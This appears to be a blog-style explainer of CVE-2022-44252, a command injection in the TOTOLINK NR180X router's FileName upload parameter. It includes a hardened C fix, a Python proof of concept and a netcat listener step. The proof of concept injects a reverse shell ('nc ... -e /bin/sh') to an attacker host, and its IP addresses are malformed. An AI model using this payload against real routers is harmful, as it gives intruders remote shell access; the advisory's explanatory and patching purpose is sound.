CVE-2022-44252 - How TOTOLINK NR180X’s FileName Parameter Allows Command Injection

TOTOLINK routers are a popular choice for home and small office networks because they’re budget-friendly and easy to use. But as with many connected devices, vulnerabilities happen—and some can be dangerous. One such flaw is CVE-2022-44252, found in the TOTOLINK NR180X (firmware version V9.1.u.6279_B20210910), which can let attackers run their own commands on your router using a simple trick in the FileName upload function. This post breaks it all down in plain English, with code, links, and a walk-through of how this bug can be exploited.

What is CVE-2022-44252?

CVE-2022-44252 is a critical command injection vulnerability found in TOTOLINK NR180X routers, specifically in the firmware version V9.1.u.6279_B20210910. The bug is present in the function that handles setting upload configurations—namely, the setUploadSetting function. This function doesn’t check or sanitize the contents of the FileName parameter, which lets an attacker slip in malicious commands.

- Parameter: FileName in setUploadSetting
- CVE: CVE-2022-44252

How Does the Vulnerability Work?

When users upload files (like settings or backups) to the router, the web interface receives several parameters. Among them is a parameter called FileName. The backend code takes that value and, without any checking, uses it in a system command. If you slip a semicolon (;) and a shell command into the filename, the router will execute it.

Example Vulnerable Code (Pseudo)

// Pseudo-code that demonstrates the fault
void setUploadSetting(char* FileName) {
    char cmd[256];
    // Vulnerable: FileName is used directly in system()
    sprintf(cmd, "cp %s /tmp/upload/", FileName);
    system(cmd);
}


If you control FileName, you control the command.
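
The hardened counterpart to the pseudo-code above, as an added example that is not TOTOLINK's firmware code: the file name is checked against an allowlist and then handed to cp as a single argv element through fork/execl, so no shell ever parses it. The function names, the 64-character limit and the /bin/cp path are assumptions.

```c
/* Added example: hardened form of the vulnerable pseudo-code.
   Names, limits and paths are assumptions, not firmware code. */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

static const char ALLOWED[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._-";

/* Allowlist check: 1..64 chars from ALLOWED, no leading dot or dash.
   This rejects ';', spaces, '/', '$', backticks and all other shell syntax. */
int is_safe_filename(const char *name) {
    size_t len = name ? strlen(name) : 0;
    if (len == 0 || len > 64 || name[0] == '.' || name[0] == '-')
        return 0;
    return strspn(name, ALLOWED) == len;
}

/* Copy src_dir/name into dst_dir without system(): the path is one argv
   element, never command text. Returns 0 on success, -1 otherwise. */
int safe_copy_upload(const char *src_dir, const char *name, const char *dst_dir) {
    char src[512];
    if (!is_safe_filename(name))
        return -1;
    int n = snprintf(src, sizeof src, "%s/%s", src_dir, name);
    if (n < 0 || n >= (int)sizeof src)
        return -1;               /* refuse truncated paths */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {              /* child: exec cp directly, no /bin/sh */
        execl("/bin/cp", "cp", "--", src, dst_dir, (char *)NULL);
        _exit(127);              /* only reached if exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}

int main(void) {
    /* Constructed sample inputs */
    const char *samples[] = { "backup.cfg", "backup.cfg; id", "../etc/passwd" };
    for (int i = 0; i < 3; i++)
        printf("%-16s -> %s\n", samples[i], is_safe_filename(samples[i]) ? "accept" : "reject");
    return 0;
}
```

Either control alone closes this bug; keeping both means a later change to one of them does not reopen it.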

Access the File Upload Feature

An attacker locates the router’s admin portal, usually on the local network (but sometimes exposed to the internet).

Instead of a normal file name like backup.cfg, the attacker sends something like:

backup.cfg; nc 192.168..100 4444 -e /bin/sh;

Send the Request

The attacker sends a POST request to the setUploadSetting endpoint. This can be done using Python’s requests library.

Router Executes The Command(s)

The router, when processing the upload, runs system(cmd), which now includes the attacker's command.

Here’s a simple proof-of-concept exploit for educational purposes:

import requests

# Router details
url = "http://192.168..1/cgi-bin/cstecgi.cgi"
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}
# Evil filename injects a reverse shell
data = {
    "topicurl": "setUploadSetting",
    "FileName": "normal.cfg; nc 192.168..100 4444 -e /bin/sh;"
}

# Send malicious request
response = requests.post(url, headers=headers, data=data)
print(f"Status: {response.status_code}")
print(response.text)


Note: Run a netcat listener on your machine:  

nc -lvnp 4444


If the exploit works, you get a shell from the router!

Update your Firmware!

Check TOTOLINK’s support page for a fixed firmware version for your model.

Conclusion

CVE-2022-44252 is a real-world example of how a small coding mistake (not checking user input) can cause a big security hole. If you own or manage a TOTOLINK NR180X router (or similar models), update ASAP and double-check your network’s defenses.

Stay safe, and patch your stuff!

*This article is for educational purposes only. Always get permission before testing on any device you don’t own.*

Timeline

Published on: 11/23/2022 16:15:00 UTC
Last modified on: 11/26/2022 03:42:00 UTC